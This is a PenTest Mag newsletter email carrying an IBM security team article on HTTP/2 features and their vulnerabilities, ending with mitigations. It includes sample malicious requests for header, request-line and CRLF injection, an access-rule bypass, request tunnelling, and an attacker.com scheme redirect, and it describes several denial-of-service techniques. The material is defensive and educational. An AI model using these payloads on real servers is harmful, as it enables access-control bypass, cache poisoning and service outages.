You are on page 1of 19

Eduardo Souza <eduardo.araujo@gmail.

com>

PenTest Mag's weekly read for you!


1 mensagem

Bartek from pentestmag <bartek.adach@pentestmag.com> 10 de julho de 2023 às 01:35


Responder a: Bartek from pentestmag <bartek.adach@pentestmag.intercom-mail.com>
Para: eduardo.araujo@gmail.com

Hi Eduardo,

Authors
Pranali Phadtare, Soummya Kulkarni, Shruthi Shunmugom M

About Us
IBM PTC is a proficient internal Security Test Team responsible for
vulnerability assessment & ethical
hacking of web, mobile applications & infrastructure.

Abstract

HTTP/2 is an upgraded version of the HTTP 1.1 protocol. HTTP/2 provides


various considerable refinements in terms of performance by addressing
the prominent issues with HTTP/1.1 protocol. These refinements seems to
have incidental impact in terms of security. This article tries to elucidate
various functionalities of HTTP/2 and also explains web application related
vulnerabilities of HTTP/2, such as Denial of Service attacks and
downgrading vulnerabilities.

Introduction to HTTP Protocol

HyperText Transfer Protocol (HTTP) is a communication protocol used to


connect to Web servers on the Internet or on a local network. The primary
function of HTTP is to establish a connection with the server and send
HTML pages back to the user's browser. It is also used to download data
from the server, either to the browser or to any requesting application that
uses HTTP.

HTTP is an application layer protocol and works on Client-Server model.


Basic working of HTTP can be as follows:
1. Client establishes TCP connection with server.
2. Client sends an HTTP request to server that includes what data the
client requires.
3. Server responds with a status code and data to client in the form of
response.
4. Client closes the TCP connection once all the required data is
received.

So far, there are various versions of HTTP and their iterations include
HTTP/0.9, HTTP/1.0, HTTP/1.1, HTTP/2. The evolution in the versions
indicates the improvement in communications in the form of request and
response as we got to the latest version.

HTTP/2 is the latest version of HTTP protocol. It was officially released in


the year 2015 after the release of HTTP/1.1 in the year 1997. The goal
behind this version was to make applications more simple, robust, and
faster. There was a need for a higher version of protocol because over the
years web pages or web applications had become more complex. There
was an increase in the size of scripts and more visual media was
displayed. There was significant increase in the transfer of data leading to
a greater number of requests and response. This created more complexity
and overhead on HTTP/1.1, hence HTTP/2 was introduced with enhanced
features that are being widely used today.

Evolution of HTTP/2 from HTTP/1.1

HTTP/2

HTTP/1.1 is a very basic client server architecture based on a TCP


connection in which the client sends a request and waits for its response. A
client establishes a TCP connection with the server, which is a stateful two-
way communication and then sends a request to the server; for example,
the client requests an index.html page and this request gets processed at
the server and the index.html is returned to the client.

Until this processing is complete at the server side, no new requests can
be sent. But this is an underutilization of the TCP connection as the TCP
connection is capable of handling multiple requests at a time. To load a
complete web page, we might need a lot of other supporting files apart
from the main.html page. For example, there could be JavaScript files,
CSS files, image files, etc.

So, for the web page to load completely over HTTP/1.1, each request must
be sent individually, and the response for each is retrieved one by one.
Obviously, the wait time impacts the speed the web page loads. To solve
this problem, modern browsers made use of six TCP connections at once if
the server is configured to use HTTP 1.1. So, the moment a user requests
a web page, as mentioned earlier, this web page needs many files along
with the main page. In this case, the browser opens six new TCP
connections and each request is sent over each of the six TCP
connections. This design is still slow, because if the number of files is more
than six, then there is a wait time again. Only if any of the six TCP
connections is closed can a new TCP connection be initiated for requesting
the seventh file. This design is also very expensive with more memory
being consumed.

To overcome the above limitation of HTTP 1.1, HTTP 2 was introduced.


The main goals of HTTP 2 are to improve latency with the introduction of
multiplexing, minimize protocol overhead via efficient compression of HTTP
header fields, request prioritization and server push.

HTTP 2 protocol maintains the basic HTTP protocol skeleton. The


enhancement is only made in the way the data is framed and transmitted
between the client and the server and making sure that the network
resources are efficiently utilized. The key catches of the HTTP/2 protocol
are explained in short below.

1. Introduction of a new binary framing layer and Multiplexing

This is the most important enhancement made in the HTTP/2 protocol. The
binary framing layer facilitates encapsulation and transfer of data between
the client and the server. The HTTP/1.x protocol was a newline delimiter
plaintext protocol, whereas in HTTP/2, the data to be transmitted is split
into messages and frames encoded in binary format.

The full request from the client is first broken down into multiple frames.
The frames can be a header frame, a data payload frame, etc., and each
frame is given a stream identifier in the header of each frame. After it is
broken down into frames, one or more frames can together form a
‘message’. A message is treated as a logical HTTP message, i.e., a
request and a response containing one or more frames. In this way, the
data is transformed and sent over the TCP connection and when the server
returns data to each of these messages in return, finally at the client side,
by using the stream identifier, data is properly arranged and presented to
the client and the end user.

The underutilization of the HTTP/1.1 protocol was overcome in HTTP/2 by


the introduction of full request and response multiplexing. Multiplexing
allows transfer or delivery of multiple requests and responses in parallel in
a single TCP connection. This enabled a smooth flow of requests and
responses without any wait time or blocking. All these enhancements
ultimately resulted in a lower page load time by reducing latency and
utilizing the network capacity to its best. As a result of all these
enhancements, multiple TCP connections are not required; only a single
TCP connection per origin completely serves the purpose, thereby
improving the network performance.
Source: https://dl.acm.org/doi/fullHtml/10.1145/2542661.2555617

2. Stream prioritization

HTTP messages are split across various frames and these frames are
transmitted as streams. These streams are multiplexed. Hence,
performance needs to be considered as there are multiple streams and
frames exchanged between client and server. To make this easier, HTTP/2
assigns weight and dependency to each stream. Streams are assigned an
integer weight and each stream may be given dependency on another
stream. Based on this weight and dependencies, a prioritization tree is
constructed by the client to decide how it would prefer to receive
responses. The server also uses this information to prioritize streams for
controlling CPU, memory, and allocation of other resources. This feature
improves browsing performance where there are many resources with
different dependencies and weights.

Source:

https://web-dev.imgix.net/image/C47gYyWYVMMhDmtYSLOWazuyePF2/
ydLldhPadjknvvrUiCai.svg
3. Flow control

The sender sends multiple requests to the receiver thus overwhelming it.
For example, a user wants to watch a video, hence the client has
requested the data on priority, now the user has paused the video so the
client wants to pause the delivery from server of unnecessary data and
buffering. The flow control mechanism prevents the sender from
overwhelming the receiver with data it does not want or is able to process.
HTTP/2 has multiplexed the stream into a single TCP connection. It allows
client and server to implement stream and connection level flow control.
Flow control has a direction and a window size chosen by the receiver for
each stream and connection. "SETTINGS" frames are exchanged between
client and server when the HTTP/2 connection is established. This frame
allows you to set the size of the flow control window in both directions. No
specific algorithm is provided by HTTP/2 to implement flow control. An
example for this feature can be something like this - a user has fetched an
image via browser. Application layer flow control allows you to fetch a
preview of an image, display it, and reduce the size for that window to zero.
It allows high priority fetches to proceed and resume the fetching when
high priority fetches are complete.

4. Header compression

Every HTTP request or response contains HTTP headers that describe


additional context and metadata about the request or response. In
HTTP/1.1, these headers are sent as plain text and there is a considerable
amount of bytes consumed in transferring the header between the client
and the server. With the evolution of HTTP/2, this extra burden on the
network is reduced by a mechanism called header compression and this is
done by an algorithm called HPACK. The compression algorithm mainly
focuses on two things. It encodes the header fields using static Huffman
code. This reduces the transfer size. The algorithm encodes each header
field individually. Also, an indexed list of previously seen header fields is
maintained, which is used as a reference to encode previously transmitted
headers fields in any upcoming compression. The HPACK compression
method also consists of a static and dynamic table. The static table
maintains a list of commonly used headers across the requests and the
dynamic table is updated based on the transferred header fields within a
particular connection. As a result, the size of each request is reduced by
using static Huffman coding for newly transmitted headers, and substitution
of indexes help for values that are already present in the static or dynamic
tables on both the client and the server side.
HPACK

HPACK is a header compression algorithm supported by HTTP/2. This


algorithm is applied to both request and response. The purpose of this
algorithm is to compress data as much as possible and then encrypt it,
which is computationally easy than other techniques. It uses three methods
of compression:

1. Static dictionary: It contains header fields that have predefined


values, which are almost 61 entries.
2. Dynamic dictionary: It contains unique headers that were detected
during connection. It has limited size. Hence, when new entries are
added, old ones are deleted.
3. Huffman encoding: This encoding method is used to encode string:
name or value.

When there is a connection, HPACK looks for headers because it encodes


and compresses header name and value.

If the header name: value pair is present in static dictionary, then it will
simply refer to that encoded value, which will hardly take 1- or 2-byte size.
If new header is encountered, it will add it to the dynamic dictionary or, if
previously encountered, it will simply refer to the dynamic dictionary and
only encode the header value, which will again take only 1 or 2 bytes, thus
compressing headers as much as possible.

Server push

It is well known that, for a complete web application to load, there are
multiple files required. For an instance, the main.html in a web application
would require several supporting files along with it to be served. Instead of
the client requesting each page, Server push enabled the capability of the
server to return all the required files for the web page to load completely to
the client in response to a single client request. Here, the client doesn’t
have to request each page individually.
Source: https://twitter.com/apnic/status/1255699646866997255

Vulnerabilities with HTTP/2

In this section, we shall cover different attack surfaces and vulnerabilities


identified within the enhancements of HTTP/2.

URL Prefix Injection

In HTTP/1.x protocol, to describe the Request method, Target URI ,


response status codes, request line and status lines were used. For
example: GET /index.html HTTP/1.1.

But with the introduction of HTTP/2, pseudo headers replaced the request
lines and status lines. Pseudo-headers are used to indicate information
about the request message. There are five pseudo-headers in HTTP/2
namely, :method, :path, :authority, :scheme and :status. These are not
regular HTTP headers, but only a replacement of the status line in
HTTP/1.x. The below figure shows the header representation of a sample
HTTP/2 application.

Each of these pseudo headers serve different purposes. One among them
is the :scheme header. The :scheme header is used to represent the
scheme of the target URI. It can take values like HTTP, HTTPS, etc. But it
can also take random values. For example, a :scheme header can take the
value of a URL. If proper validation is not in place, this could even lead to
redirection and cache poisoning.

Request headers:

:method GET

:path /index.html

:authority9.199.145.174:8443

:scheme http:// attacker.com/hack?

Response:

HTTP/1.1 301 Moved PermanentlyLocation: http:// attacker.com/hack??:


//9.199.145.174:8443/index.html

Few web applications use the scheme to build the URL to which the
request is routed, creating a probable SSRF vulnerability.

Header Name Splitting

The host header in HTTP/1.x is replaced by :authority pseudo header in


HTTP/2.

:method POST

:path /index.html

:authority test.com

:scheme https

user-agent burp

x=123&y=4

There are some servers that do not allow new lines in header names but
do allow colons. Hence, this can be used to carry out desynchronization in
HTTP/2. This can be used to provide the server with multiple hosts. A host
header in an HTTP/2 request is written as :authority <host name>, so we
can add one more host header in the following way host:attacker.com 443.
This is treated as new header by HTTP/2, which can result in host header
injection.

:method GET

:path /

:authority example.com

host: test.com443

GET / HTTP/1.1

Host: example.com

Host: test.com:443

Ambiguity and HTTP/2

HTTP/1.x allows the addition of multiple headers, thus resulting in various


attacks like Host Header Injection. But there was no option to supply
multiple paths. In HTTP/2, as described earlier, the request line is replaced
by pseudo headers like :method, :path, etc. Hence, this can be utilized to
supply multiple paths. There are servers that accept multiple paths and are
inconsistent in which path they process. We can supply multiple paths in
the following way thus creating an ambiguity.

:method GET

:path /some-path

:path /different-path

:authoritytest.com

This way, servers will be confused on which path to process, opening a


door to various vulnerabilities.

Request Line Injection


The request line contains an HTTP request method, the request URL’s
path and an HTTP version. The HTTP request method tells the server what
should be done with the requested resource. There are various HTTP
request methods, like GET, POST, PUT, etc. The path element of the
request URL relates to the resource target and identifies the backend
connections for the requested resource. Finally, when sending the
response back, the HTTP version shows the anticipated version.

If the front end permits spaces in the :method, request line injection is
enabled.

Since proxy permits space in :method <GET /admin HTTP/1.1> is


considered as a part of :method and </fakepath> will be considered as
:path attribute. If the backend server accepts junk in the request line, we
can bypass block rules.

<ProxyMatch “/admin”>

Deny from all

:method GET /admin HTTP/1.1

:path /fakepath

:authoritytest.com

GET /admin HTTP/1.1 /fakepath HTTP/1.1

Host: internal -server

Header Tampering Wrap

Line Folding is a feature where we can put \r\n followed by a space in a


header value and the subsequent data would be ‘folded’.

If an application with HTTP/2 front-end accepts space before the header


name and if the backend accepts line folding, we can tamper the headers
as follows:

GET /admin HTTP/1.1

Host: sample.com

Request-Id: 1234

Poison: x

User-agent: burp

………..

HTTP/1.1 200 OK

Content-Type: text/html

Content-Length: 2500

Request-Id: 1234 poison: x


Here :method is set as <GET / HTTP/1.1> along with Host header and
Request Id set as <redacted.net> and <1-6022d2c4b-> . Since the
application backend accepts folding, poison header gets folded, which
causes the response to accept poison:x as a part of Request-Id.

Denial of Service Attacks in HTTP/2

Reset Flooding

Reset flood is a type of DoS where an attacker sends invalid requests on


multiple streams to the HTTP/2 target in expectation of receiving
RST_STREAM packets.

An invalid request can cause a peer to send RST_STREAM frames in


response. A RST_STREAM frame is to cause the stream to become
"closed". This releases the stream reservation. So, when RST_STREAM
packets are received in an HTTP/2 response, the request connection is
open. Depending upon the configuration set on maximum RST_STREAM
packets sent per connection in a minute, it can consume an unbounded
amount of CPU and memory resources. Excess consumption of the
resources eventually causes resource exhaustion leading to Denial of
Service.

Settings Flood:

An attacker sends a stream of SETTING frames to the server; each


SETTINGS frame requires acknowledgment.

The SETTINGS frame does not need to maintain any state other than the
current value of each setting. Therefore, the value of a SETTINGS
parameter is the last value that is seen by a receiver.

Depending upon the configuration of SETTINGS frames received per


connection, data is queued, which can consume excess CPU or memory
leading to denial of service.

The SETTINGS frame might also be abused to cause a peer to expend


additional processing time. This might be done by pointlessly changing
settings, sending multiple undefined settings, or changing the same setting
multiple times in the same frame.

Limits in SETTINGS cannot be reduced instantaneously, which leaves an


endpoint exposed to behaviour from a peer that could exceed the new
limits. In particular, immediately after establishing a connection, limits set
by a server are not known to clients and could be exceeded without being
an obvious protocol violation.

Stream Multiplexing and Reuse attack:

Stream Multiplexing functionality was introduced to facilitate multiple


streams over a single TCP connection to reduce page load time and
network bandwidth. A stream corresponds a single request and a single
response. When the client wants to send a request to the server, it opens a
new stream and assigns a stream identifier to it. This stream is purely
meant for one single request and response, and it cannot be used by any
other requests. Basically, once a stream identifier is utilized and closed, the
same stream identifier cannot be used again to represent another
request/response in the same connection, according to the RFC standards.
Stream Reuse

When the client wants to request a page to the server, it sends the request
1 by opening a new stream – Stream 1 and assigns a stream identifier to it.
The client sends the request over stream 1 and the server responds on the
same Stream 1. Now if the client wants to send another request 2 to the
server, ideally it has to open a new stream – Stream 2 for request 2. In
Stream reuse attack, sending the request 2 over the used Stream 1 could
lead to Denial of Service on the server. Research done on IIS vulnerable
version 10 has shown that utilizing the same stream in the same
connection has led to the Blue Screen of Death.

Dependency Cycle Attack:

As described earlier, the HTTP/2 protocol splits the HTTP messages into
multiple frames and these frames are transmitted over streams. As a
result, multiple frames are exchanged between the client and the server.
During this flow, the streams are assigned with integer weight and a
dependency. In this way, a dependency graph is constructed. According to
the RFC standard, the dependency graph should be a true and never be a
cycle, as a cycle-based dependency graph can lead to an infinite loop and
finally crash the server. Apart from this, the size of the graph is also not
limited. This means that, a server can set its own size limitation. If the
dependency tree size limitation is not implemented, a malicious client can
create a huge sized graph which can consume the server’s entire memory.
Few servers have seemed to show Denial of Service because of the lack of
these implementations in place. A configuration to implement size limitation
to the dependency graph is to set the MAX_CONCURRENT_STREAMS.
When the MAX_CONCURRENT_STREAMS is achieved, the server cleans
up the old memory address and assigns it to the new stream.

DoS on httpd

Each stream in the HTTP/2 transmission is given a particular memory


address in the server. As described above, when the
MAX_CONCURRENT_STREAMS value is achieved, the server cleans up
the memory and assigns the addresses to new streams. If the cleanup
process is not proper, then this process can go on a loop and eventually
result in Denial of Service. Not much research has shown that servers like
nhttpd have resulted in a failed memory clean up, thus resulting in a DoS
condition. For example:

There are 15 streams in a connection and the streams are assigned with a
particular memory address like below.

Stream 1 – address = 1046567980

Stream 2 – address = 1046567981 and so on…

And Stream 7 – address = 1046567986.

Here, assume that the Stream 1 has a dependency on Stream 2.

Now if the server achieves the MAX_CONCURRENT_STREAMS value, it


must clean up the oldest stream - Stream 1’s address and assign Stream 8
to it. Due to a flawed clean up, the dependency stream – Stream 2 is not
cleaned up. This creates a loop between Stream 8 and Stream 2.
HPACK Bomb

HPACK Bomb is kind of DoS attack that takes advantage of the HPACK
algorithm being used in HTTP/2. In this attack, the attacker supplies a
header field that is very large in size. It is exactly the same size as that of a
dynamic table. It inserts that header field in the dynamic table, which has
same size of that header field. The attacker now sends a header block,
which are repeated requests to expand that field in dynamic table. This
leads to compression of a large amount of data to a smaller size.

When the compressed data is decompressed at server side, it results in


very large amount of decompressed data. Let’s say 16 KB compressed
data is decompressed to 64 MB of data. This results in consumption of
server memory resources that can result in a server crash or unavailability
of server, leading to a Denial of Service attack.

Empty Frames Flood:

HTTP/2 protocol also shows itself vulnerable to empty frames flood. Empty
frames flooding is an attack in which a malicious client tries to send n
number of empty frames, i.e., frames with empty payload and without
setting the end-of-stream flag. The frames that can be used to flood are
DATA, HEADERS, etc. The server tried to process these empty frames
without being able to achieve the end of the stream thus consuming excess
CPU. This eventually results in Denial of Service.

Slow Read

An attacker crafts a malicious HTTP request to open a connection between


a single computer and target server and tries to keep those connections
open for a longer period causing higher consumption of resources causing
slow responses from server and is identical to the well-known Slowloris
DDoS attack. Slowloris is an application layer DDoS attack where an
attacker can use a valid HTTP method like GET or POST to open the
connection on the Target Server. An attacker sends millions of requests to
the target server using above mentioned HTTP methods to slow it down,
which degrades the server with large packets of inactive data. The attacker
launches this attack using a GET request and sends the request with
header such as END_HEADER and END_STREAM to reset the flag.

Data Dribble

In HTTP/2, data is transmitted as streams. Priority is given to each stream


by assigning them weights and, accordingly, streams are transmitted and
responses are received. When the weight of the stream is high, it is
transmitted first and vice versa. This stream and window feature of HTTP/2
is utilized by the attacker to construct an attack. The attacker makes a
request to the server to fetch a large amount of data from a resource over
multiple streams. Stream priority and window size is manipulated by the
attacker. It forces the server to queue a large amount by transmitting 1 byte
at a time.The attack works in the following way:

1. Attacker requests 100 MB of data from server.


2. It requests it as 1MB over 100 hundred streams.
3. Attacker manipulates window sizes and stream priority.
4. It forces server to queue data in chunks of 1 byte.
5. This becomes computationally expensive for the server to process.
Due to this, there is excessive consumption of memory and CPU usage,
thus hampering the efficiency of the server.

Resource Loop

In this attack, the attacker takes advantage of the feature stream


prioritization implemented in HTTP/2. As mentioned above, streams are
given a priority and, based upon that, they are transmitted.An attacker
leverages this feature by changing the priority of streams. Multiple requests
are created by the attacker and the priority of streams are tampered with.
Due to this, there is a change in the prioritization tree continuously leading
to a loop, leading to excessive consumption of CPU usage.

Internal Data Buffering

An attacker opens an HTTP/2 window and closes a TCP connection. It


makes such a request that has a huge response size. Due to this, the data
is sent without any limitations, but it is not allowed to write bytes on the
wire, causing buffering of the requested object, which cannot be written to
the client. This condition builds up a queue of responses, thus consuming
excessive memory and resources.

HTTP/2 Downgrading:

A good practice when HTTP/2 is implemented is to have an end-to-end


HTTP/2 connection. But many systems do not seem to ensure this. Most of
the time, HTTP/2 is implemented on the front end. But the back-end legacy
systems are still using HTTP/1.x protocol. This opens a need for HTTP/2
downgrading. In HTTP/2 downgrading, the front-end HTTP/2 request is
translated or converted into an equivalent HTTP/1.x message and then
served to the back-end server, which is on HTTP/1.x protocol. The
HTTP/1.x response from the back end is again converted back to an
HTTP/2 equivalent before it is served to the front end. This is the process
of HTTP/2 downgrading.

Below are few of the vulnerabilities associated with HTTP/2 downgrading.

Request Smuggling:

A full HTTP request is recognized by its message length indicated by


Headers like Content-Length and Transfer-Encoding. Different servers
have different ways of interpreting the length of the request. HTTP request
smuggling occurs when there is a discrepancy in how the front-end and
back-end servers process the request and is achieved by abusing Content-
Length and Transfer-Encoding headers. A malicious request is combined
with an original request body and is then sent to the back-end server for
processing. The second malicious request in the first request body is
smuggled and made to be processed by the back-end server. Thus, having
conflicting Content-Length headers could cause different proxy servers to
interpret the request differently and result in Request smuggling attacks.

Having an end-to-end HTTP/2 connection, protects from a request


smuggling attack. But when HTTP/2 downgrading happens, it even makes
previously secure web applications now vulnerable to smuggling attack.

H2.CL Desync Vulnerability:

The HTTP/2 protocol uses its own built in length mechanism to identify the
end of an HTTP request. So, a dedicated header that indicates the content
length is not required for an HTTP/2 connection. But when there is a
downgrade happening, the front-end servers will add an additional
Content-Length header to the HTTP request and then forward to the back-
end server. A malicious user can inject or manipulate the Content-Length
header and therefore the back-end server can treat the incoming request
as two different requests. An example representation of a H2.CL Desync is
shown below.

H2.TE Desync Vulnerability:

The HTTP/2 protocol prohibits the use of Connection-specific headers. But


an exception to this is the Transfer-Encoding header and this header can
only contain the value “Trailers”. In case any other value of TE header is
present in an HTTP/2 request, the request would fail with a protocol error. If
there is an improper validation of this header and the request is
successfully downgraded and sent to the backend, a smuggling attack may
be possible with this scenario.

Such downgrading can lead to many more Desync attacks like H2.TE
request line injection, H2.TE Header injection, H2.X via request splitting
and so on.
Response queue poisoning:

This is a kind of smuggling attack in which a mismatch of requests and its


corresponding response happens. For example, there are three Requests
and three Responses in a connection. When a smuggling attack happens,
the queue is poisoned, and the front-end server matches Request 1 with
maybe Response 3 and serves it to the user. This might create heavy
impact to the front-end user. The front-end user could receive completely
irrelevant responses. An attacker can make use of this vulnerability and
receive responses of other users to steal sensitive information like cookies,
PII data, etc.

CRLF:

When a browser sends a request to a web server, the web server answers
back with a response containing both the HTTP response headers and the
actual website content, i.e., the response body. The HTTP headers and the
HTML response (the website content) are separated by a specific
combination of special characters, namely a carriage return and a line
feed. For short, they are also known as CRLF.

HTTP/2 request splitting

HTTP Response Splitting is a protocol manipulation attack that occurs


when a web server fails to sanitize CR and LF characters before the data is
included in outgoing HTTP headers.HTTP protocol consists of requests
and responses, each HTTP request consists of Request Headers as well
as request Body. Each request header is followed by a carriage return (\r)
and a linefeed (\n)A simple HTTP request would look like

HTTP/1.1 200 OK \r\n

Content-Encoding: gzip \r\n

Content-Type: text/html; charset=UTF-8 \r\n

Content-Length: 606 \r\n\r\n


<title>Hello World!</title>

Since the header of an HTTP request and its body are separated by CRLF
characters, an attacker can try to inject a combination of CRLFCRLF which
tells the server that the header ends and the body begins as shown below:

HTTP/1.1 302 Found

Content-Type: text/html

Location: \r\n

Content-Type: text/html \r\n\r\n

<html><h1>hacked!</h1></html>

Content-Type: text/plain

Request smuggling via CRLF injection

An HTTP request smuggling vulnerability occurs when an attacker injects


essential headers in a single request. This can cause either the front-end
or the back-end server to incorrectly interpret the request and keep the
connection open after responding to the initial request. Each request
header is followed by a carriage return (\r) and a linefeed (\n). In HTTP/1,
CRLF (\r\n) is used after each header to terminate the header, while in
HTTP/2, the headers are not separated using CRLF so including it inside
the header value wouldn’t cause the header to be split.

HTTP request smuggling arises because the HTTP specification provides


two different ways to specify where a request ends: the Content-Length
header and the Transfer-Encoding header. Both the headers are sent in a
single request manipulating the frontend and backend server. Server
processes the Transfer-Encoding header, and so treats the message body
as using chunked encoding, where an attacker can add a smuggled
request.

Request Tunnelling

Request smuggling attacks are possible because multiple requests are


handled by the same connection between front end and back end. For
example, some servers allow you to reuse the connection for multiple
requests that generate from same IP address or client.

We can’t poison the socket to interfere in other user’s request we can still
send a single request that will give two responses from back end. This will
enable us to hide the request and its response from the front end. This
technique to bypass front end security measures is called request
tunnelling.
In HTTP/2, each stream should contain a single request and response. If
we receive an HTTP/2 response and the response body appears to be
HTTP/1 response, then we can conclude that the second request is
successfully tunnelled.

One such method of request tunnelling is leaking internal headers.


Basically, we trick the front end to append the internal headers, which will
become body parameter in back end.

:method POST

:path /comment

:authority vulnerable-website.com

content-typeapplication/x-www-form-urlencoded

foo bar\r\n

Content-Length: 200\r\n

\r\n

comment=

Let us consider this sample request, initially both front and back end will
agree that this is a single request, but they can be made to disagree on
where the headers end.

Front end – Considers everything as part of header and will append the
new headers after comment= string.

Back end – Sees /r/n/r/n sequence and considers this as the end of
headers and will treat comment= string along with internal headers as part
of the body and will consider the new headers as part of the value of the
comment parameter.

Blind request tunnelling

In some servers, if we successfully tunnel a request, we can see the


response of the second request wrapped in the response body of first
request.

While some servers read the number of bytes specified in Content-Length


header of response and will only show the first response to the client, even
though you tunnel a request, you will not be able to identify that tunnelling
has happened.

Non-blind request tunnelling

Blind request tunnelling is hard to identify but can be made non-blind using
the HEAD method.

Response to HEAD requests contains Content-Length header and they


don’t have body of their own. Content-Length value normally refers to
length of resource returned by GET request to the same endpoint.
There are some front-end servers which read the number of bytes
specified in header. If we tunnel the request successfully over the front-end
server, it will cause it to overread responses for tunnelled request from
backend.

Request

:method HEAD

:path /example

:authorityvulnerable-website.com

foo bar\r\n \r\n GET /tunnelled HTTP/1.1\r\n Host: vulnerable-


website.com\r\n X: x

Response

:status 200

content-type text/html

content-length 131

HTTP/1.1 200 OK Content-Type: text/html Content-Length: 4286


<!DOCTYPE html> <h1>Tunnelled</h1> <p>This is a tunnelled
response</p>

Conclusion

Any new technology will have its surface open to the cyber world. Even
though HTTP/2 improved the performance of the website, the protocol
implementation flaws and misconfigurations have exposed the website
using HTTP/2 to greater security risks. Applications that were secure
earlier have now become insecure in a few aspects. A whole new set of
vulnerabilities also arise when the HTTP/2 protocol is not implemented
end-to-end and with downgrading. Throughout this article, we tried to
showcase a few of the security vulnerabilities associated with HTTP/2
protocol. It is very much essential for any organization to ensure that they
are aware of these security loopholes and take prompt action in preventing
bigger cyber-attacks. Below are a few of the mitigation techniques we
would recommend for the ones who would like to secure their websites on
HTTP/2.

It is always recommended to install the patch and upgrade to the latest


versions as per the product instructions. Implementing a web application
firewall that supports HTTP/2 protocol could also help in preventing Denial
of Service attacks.

Most of the HTTP/2 vulnerabilities are caused due to downgrading protocol


to HTTP/1.1, so avoiding downgrading and using HTTP/2 end to end can
decrease the vulnerabilities. If the HTTP/2 server still supports
downgrading, then we enforce charset limitations on HTTP/1.1, such as
rejecting requests that contain newlines in header, colons in header
names, space in request method, etc. Another prevention technique would
be to not use users input directly inside response headers. If not, we can
sanitize the CRLF characters before passing into the header by using a
function to encode the CRLF special characters. The developer can also
use an updated programming language to a version that does not allow CR
and LF to be injected inside functions that set HTTP headers.

Bartek from pentestmag Unsubscribe from our emails

Powered by Intercom

You might also like